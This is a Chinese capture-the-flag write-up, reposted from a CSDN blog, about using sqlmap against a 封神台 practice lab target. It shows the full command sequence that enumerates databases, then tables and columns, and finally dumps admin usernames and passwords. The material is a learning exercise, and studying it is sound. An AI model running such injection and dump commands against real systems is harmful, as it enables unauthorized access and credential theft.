封神台----为了女神小芳

简介: 本次实战是对自己在学习mysql数据库前对于数据库的一些基础的学习与复习,并且在实战过程中,我也熟悉了之前没有使用过的Sqlmap工具的使用,对我来说是一种很大的提高,也培养了自己独立思考和学习的能力,为自己今后的学习打好了基础.

前言

                     

版权声明:本文为本博主在CSDN的原创文章搬运而来,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。                       

原文链接:https://blog.csdn.net/weixin_72543266/article/details/132819842


对一次封神台靶机题目的实战,Sqlmap我想大部分都很熟悉,但我也就只是听过并没有使用过这个工具,这里简单介绍一下,帮不太熟悉的朋友简单了解一下。众所周知,top10名列前茅的漏洞就是注入漏洞.任何一个学习web渗透测试的朋友都需要了解的一个内容,注入分为手工注入自动工具注入,而Sqlmap就是自动工具中最好用的工具。那么直接进入主题。

本章是自己之前学习过SQL注入,但是没有使用过Sqlmap这个工具,在找到了一篇Sqlmap入门篇报告后,虽然对于SQL注入这方面的知识早已忘记,但基本原理还是清楚的,所以破不及待的来实现一番.


文章框架

image.gif 编辑

1,题目

 分析题目后,用通俗的话来理解的话来说,就是获取数据库管理员的密码

image.gif

2,实验前的准备

  1. kali虚拟机
  2. Sqlmap工具

因为自己的虚拟机中的Sqlmap版本过低并且自己写这篇文章的时候已经12点了这里,所以找了一篇大佬的教程,可以安装这篇教程进行工具的配置,如果不需要的话可以跳过了. 详情可以看我原文

                             

3,进入传送门

看到图片,它们已经成功引起了我的注意,我觉不会因为它们很可爱就不会下手的

image.gif

                      image.gif      

                              这里我们先在url中输入?id=1,看看有什么反应没

image.gif

         太可爱了,已经捕获了我的心,好想摸,可惜摸不到,算了还是明天去摸老师的猫吧

image.gif

4,使用Sqlmap对网站进行监测

4.1.检测目标地址是否存在注入点

这里我们将这个网址直接扔到sqlmap中运行检测

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch

image.gif

image.gif

解释--batch是后面有一些选项我们选择默认选项,这里的命令是在kali中运行的,如果大家在Windows安装的sqlmap区别在红色部分

  python sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch

4.2、检测数据库中的库名

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch --dbs

image.gif

                                 我们找到了数据库中的三个数据库名

image.gif

4.3、选择需要爆的库开始爆表名

也是从这里开始因为我不知道其中的命令是什么意思,所以自己去猜测是什么,然后去实验发现可以后,最后再去查这些指令,发现和我猜测的一致,也算加强自己的记忆吧.

4.3.1,后面内容的一些注意点:

-D 代表的是数据库 -T 代表的是表名 -C代表列 这两个后面接对应的库或表名

--tables 代表的是在爆破表时库的,加入后就是在报表

--columns 代表爆破表的库的列    --dump 命令,可以获取数据库中的表和表中的数据

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch +{-D + (需要爆的库名)} --tables (不写{}里的内容的话就是全爆,其中{}只是为了区别,真实没有是没有{})

4.3.2,开始进行攻击

 这里我因为知道题目是以猫相关的,所以猜测出这关于猫有关,所以直接就爆猫舍的库了

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch -D maoshe --tables

image.gif

image.gif

这里我们发现了admin这个表,代表我猜测的不错,所以,这题到这里也就基本上解决了

4.4,指定库名,表名爆破字段

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch  -D maoshe -T admin  --columns

image.gif

image.gif

这里我们发现字段中有密码(password),我们需要把字段爆出来就结束了

5.5、选择字段爆破字段中的内容

sqlmap -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --batch   -D maoshe -T admin -C username,password --dump

image.gif

image.gif

这里自己也是第一次看这种数据表,自己刚看上去也不知道什么到底是密码,还在那乱看,其实           就是按照行列来看,里面有两个信息.下面的那个信息没有显示完全也误导了我

我们只需要看表的第一行就可以了,到这里我们就获取到了flag,结束这次挑战

5,总结

本次实战是对自己在学习mysql数据库前对于数据库的一些基础的学习与复习,并且在实战过程中,我也熟悉了之前没有使用过的Sqlmap工具的使用,对我来说是一种很大的提高,也培养了自己独立思考和学习的能力,为自己今后的学习打好了基础.


每日一言

我不知道明天会怎么样,但是我一定要努力过好今天。

 

相关文章
|
开发工具
贤鱼的刷题日常----8469:特殊密码锁
讲解特殊密码锁,题目题解
178 0
贤鱼的刷题日常----8469:特殊密码锁
|
缓存 网络协议 网络架构
ICMP 是个啥破玩意?(二)
ICMP 的全称是 Internet Control Message Protocol(互联网控制协议),它是一种互联网套件,它用于IP 协议中发送控制消息。也就是说,ICMP 是依靠 IP 协议来完成信息发送的,它是 IP 的主要部分,但是从体系结构上来讲,它位于 IP 之上,因为 ICMP 报文是承载在 IP 分组中的,就和 TCP 与 UDP 报文段作为 IP 有效载荷被承载那样。
ICMP 是个啥破玩意?(二)
|
C++
今晚只为你一人----指针
今晚只为你一人----指针
89 0
今晚只为你一人----指针
|
安全 数据安全/隐私保护
不要再被骗了------QQ盗号原理大揭秘
前言 相信大家在懵懂无知的时候都有被盗号的经历吧,QQ胡乱的加好友,突然有个好友传了个文件给你,打开以后发现QQ竟然显示强制下线,然后再也上不去了QAQ,很明显,QQ号被人盗了。最近也是很多小伙伴私信我,也看了一些人发空间说QQ号被盗了啥的,以及我自己收到的一些诈骗请求。
2421 0
|
网络协议 安全 网络架构
|
程序员 Linux Windows

热门文章

最新文章